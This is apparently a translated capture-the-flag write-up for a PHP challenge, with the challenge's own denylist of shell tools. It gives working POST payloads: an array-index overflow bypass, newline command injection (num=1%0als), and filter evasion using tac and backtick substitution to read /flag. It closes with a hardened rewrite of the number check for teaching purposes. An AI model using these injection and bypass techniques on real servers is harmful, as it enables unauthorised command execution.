Attack and defense world ----- favorite_ number
2022-07-21 19:41:00 【jjj34】
Knowledge point 1: the array-index integer overflow vulnerability in PHP 5.5.9
Knowledge point 2: bypass techniques for command execution filters
<?php
// php 5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    // The array-index integer overflow is used to get past this check
    $num = $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
            // The filter bypass techniques are used here
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
}
1. Integer overflow vulnerability
Vulnerability principle
When an array index is a nine-digit hexadecimal number it overflows and wraps around, which effectively renumbers the keys: 16 to the power of 8, i.e. 4294967296, is logically equivalent to index 0.
16^8 = 4294967296
Solving the challenge:
Step 1
$stuff === $array && $stuff[0] != 'admin'
Based on this line of code, the parameters we construct are
stuff[4294967296]=admin&stuff[1]=user
Step 2
system("echo ".$num);
The system function is called here, so guess that this is a command execution vulnerability and use a truncation character (%0a, line feed) to run commands.
Construct the parameter
num=1%0als
The payload is
stuff[4294967296]=admin&stuff[1]=user&num=1%0als
Put the parameters in HackBar and send them (they are sent in a POST request), then intercept the POST request with Burp Suite.
Note %0D%0A: this is the Windows line ending; replace it with %0a and the command executes.
(The a in %0a is case insensitive.)
The vulnerability is confirmed.
Step 3
The next step is to bypass the filter
!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)
// These characters are filtered
sh,wget,nc,python,php,perl,?,flag,},cat,echo,*,^,],\,',",|
Commonly used commands such as ls are not filtered.
Because the parameter is URL-encoded, spaces have to be replaced with a + sign.
Working around the ban on cat
Because cat is banned, we use tac instead; tac is the reverse of the cat command.
cat outputs a file from the first line to the last, tac outputs it from the last line to the first.
Working around the ban on flag
Try fla*, and find that * is also banned.
The problem is how to pass /flag to tac as an argument.
Method 1, official solution
Write the /flag path into a file, then obtain /flag through that file.
Write /fla and then g into the zer0b file one after the other so that it forms /flag, then read zer0b with the tac command to obtain /flag.
`, this symbol (above the Tab key on the keyboard), means in Linux that the enclosed command is executed first (command substitution).
tac `tac /tmp/zer0b` executes as follows:
First, the content inside `` is executed, tac /tmp/zer0b, whose result is /flag.
Then the whole statement is executed, i.e. tac /flag.
The flag is obtained.
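The two application-level weaknesses used in steps 2 and 3 are the regex /^\d+$/im (with /m and $, a digit line followed by a newline and a command still matches) and the reliance on a keyword denylist in front of system(). The following is an added hardened rewrite of that number check, not the challenge's own code; the function names and the test inputs are my own. The index overflow from step 1 is a bug in PHP 5.5.9 itself and is addressed by upgrading PHP rather than by application code.

```php
<?php
// Added defensive rewrite of the challenge's number check (not the challenge's own code).
// Weaknesses in the original: /^\d+$/im lets "$" match before a newline (and /m lets
// it match at every line end), so "1\nls" passes; and a denylist regex in front of
// system() cannot enumerate every dangerous token.

// Accept only a string of ASCII digits with nothing before or after it.
// \A and \z anchor to the absolute start and end of the subject, so a trailing
// newline does not match; ctype_digit() is a second, regex-free check of the same.
function is_strict_number(string $num): bool {
    return preg_match('/\A\d+\z/', $num) === 1 && ctype_digit($num);
}

// Build the shell command only from a validated value, and still quote it with
// escapeshellarg() so the argument can never be interpreted as shell syntax.
// Returns null (reject) instead of falling back to a denylist.
function build_echo_command(string $num): ?string {
    if (!is_strict_number($num)) {
        return null;
    }
    return 'echo ' . escapeshellarg($num);
}

// Constructed test inputs (my own): the first is benign, the others are the
// shapes the original check accepts because of "$" before a newline and /m.
$cases = [
    "1"       => true,
    "1\nls"   => false,
    "1\r\nls" => false,
    "ls\n1"   => false,
    "1 2"     => false,
];
foreach ($cases as $input => $expected) {
    $ok = is_strict_number($input);
    printf("%-12s => %s (%s)\n", json_encode($input),
        $ok ? 'accepted' : 'rejected',
        $ok === $expected ? 'as expected' : 'UNEXPECTED');
}
```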